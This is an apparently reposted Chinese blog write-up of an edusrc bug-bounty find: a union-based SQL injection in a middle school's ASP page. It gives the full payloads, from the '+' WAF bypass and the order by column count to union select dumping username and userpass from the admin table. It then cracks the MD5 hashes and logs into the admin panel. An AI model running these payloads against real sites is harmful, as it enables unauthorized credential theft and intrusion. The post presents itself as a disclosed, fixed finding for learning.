记一次挖edusrc漏洞挖掘(sql注入)

这篇具有很好参考价值的文章主要介绍了记一次挖edusrc漏洞挖掘(sql注入)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

在利用fofa收集信息的时候发现的,我这里直接开始挖洞部分写了。

前言:

目标是一个中学的站点,在一次挖洞过程中遇到个sql注入,漏洞已报送平台进行了修复。该文章仅用于交流学习,切勿利用相关信息非法测试,我也是刚入门的小白,欢迎各位大佬指点。

记一次挖edusrc漏洞挖掘(sql注入)

访问url/gywm.asp?id=95%20and%201=1被拦截了(Wts-waf我这里利用了此文章

https://www.freebuf.com/articles/268726.html)

记一次挖edusrc漏洞挖掘(sql注入)

url/gywm.asp?id=95 +and+1=1的时候返回正常

记一次挖edusrc漏洞挖掘(sql注入)

url/gywm.asp?id=95 +and+1=2时候返回空白页面

记一次挖edusrc漏洞挖掘(sql注入)

已确定存在sql注入漏洞;

开始使用order by获得表的列数

访问url/gywm.asp?id=95+order+by+19--+的时候页面正常的;

访问: url/gywm.asp?id=95+order+by+20--+的时候页面显示500

判断出列数为19,此时我们可以通过union联合查询进行注入。

Payload:
url/gywm.asp?id=95+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin

此时我们可知admin的位置所以我把猜出来的表和列名放在了3和10的位置, 这下就已拿到了这两列名中的值。


Payload: 
url/gywm.asp?id=95+union+select+1,2,username,4,5,6,7,8,9,userpass,11,12,13,14,15,16,17,18,19+from+admin
记一次挖edusrc漏洞挖掘(sql注入)

账户密码都爆出来了然后去把md5密码解密后直接进去后台渗透也到此结束文章来源地址https://www.toymoban.com/news/detail-478354.html

记一次挖edusrc漏洞挖掘(sql注入)
记一次挖edusrc漏洞挖掘(sql注入)

到了这里,关于记一次挖edusrc漏洞挖掘(sql注入)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 记一次北京某大学逻辑漏洞挖掘

    0x01 信息收集 个人觉得教育src的漏洞挖掘就不需要找真实IP了,我们直接进入正题,收集某大学的子域名,可以用oneforall,这里给大家推荐一个在线查询子域名的网站:https://www.virustotal.com/ 收集到的子域名还是蛮多的,主要是子域名直接就可以复制到txt文件,方便后续域名探

    2024年04月28日
    浏览(19)
  • 记一次挖矿病毒的溯源

    ps:因为项目保密的原因部分的截图是自己在本地的环境复现。 1. 起因 客户打电话过来说,公司web服务异常卡顿。起初以为是web服务缓存过多导致,重启几次无果后觉得可能是受到了攻击。起初以为是ddos攻击,然后去查看web服务器管理面板时发现网络链接很少,但是cpu占用

    2024年02月04日
    浏览(24)
  • 记一次挖矿木马样本分析

    有一台vps被弱口令上马了 翻来翻去 找到个二进制文件如下 搜main函数可以判断是用shc加密shell脚本生成的二进制文件 在0000000000400F7E位置函数,找到了加载shell命令的位置 shc部分源码 尝试生成一个echo “helloworld”,看看shc生成的文件是什么构造 安装shc 加密后会得到一

    2024年01月25日
    浏览(19)
  • 记一次对某高校微信小程序的漏洞挖掘

    挖掘目标的部署在微信的资产(减少信息的收集,毕竟一般web站点没有账号密码不好进入后台,挖掘功能点少) 1.寻找目标的微信小程序(非原图) 2.招生小程序打不开,只能挖掘管理系统 进入后发现存在上报安全隐患功能,可以上传图片 3.准备上传shell 发现控制上传名字参数为

    2024年04月15日
    浏览(17)
  • 记一次偶然的网站sql注入

            自己学了点渗透的内容后就开始尝试挖漏洞了,偶然发现了这个yp网站,由于好奇心就浏览了一下里面的内容,突然注意到有个id的地方跳转页面,于是就想试试看有没有注入,就有了以下的内容。。。 界面如下 当时就是好奇点进去看了下,浏览了一下内容,发现

    2024年02月11日
    浏览(19)
  • 记一次SSRF漏洞的学习和利用

    导语:本文主要记录一次我们在复盘嘶吼网站渗透报告时遇到的一个SSRF漏洞。 本文主要记录一次我们在复盘嘶吼网站渗透报告时遇到的一个SSRF漏洞。此漏洞并结合腾讯云的API接口,可以获取大量嘶吼服务器的敏感信息。利用这些敏感信息,又可以进行更为深入的渗透。 这篇

    2024年02月06日
    浏览(36)
  • 记一次weblogic-10.3.6.0靶场漏洞利用

    进入Vuln-Range的weblogic-10.3.6.0靶场 靶场地址后面加上 /console 进入后台页面 使用weblogic漏洞利用工具进行扫描 删掉端口后面多余字符,输入/uddiexplorer/ 右上角图片新标签页打开 复制图片文件名 到weblogic中查找 输入 find ./ -name oracle_logo.gif(文件名) 找到的路径用记事本保存一下 在

    2023年04月18日
    浏览(21)
  • 使用google挖掘SQL注入漏洞

    1.使用Google语法进行搜索: inurl:php?id=,记得在inurl前面加公司不然出现的是英文。 2. 我们随便点击一个网站 3.我们可以看到新闻中心(一般情况下SQL注入存在新闻中心),我们点击进去进行尝试是否存在SQL注入,我们输入id=98’看到报错了,我们猜测是数字型注入  4.我们输入and

    2023年04月09日
    浏览(15)
  • 利用SQL注入漏洞登录后台

    所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击. sql注入 什么时候最易

    2024年02月09日
    浏览(20)
  • 使用Burp Suite和Python进行自动化漏洞挖掘—SQL测试注入插件

    每次测注入都是用burp的Intruder模块,很不方便就是批量跑批量测哪些没有过滤 懒人鹅上线,准备搞一个sql测试的插件 本篇文章代码量大,基础可以去看上一篇 测试sql基本注入的载荷,在可能有sql注入的地方发送测试包,目前只测试url中的,并可以根据错误回显判断出数据库

    2024年02月09日
    浏览(21)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包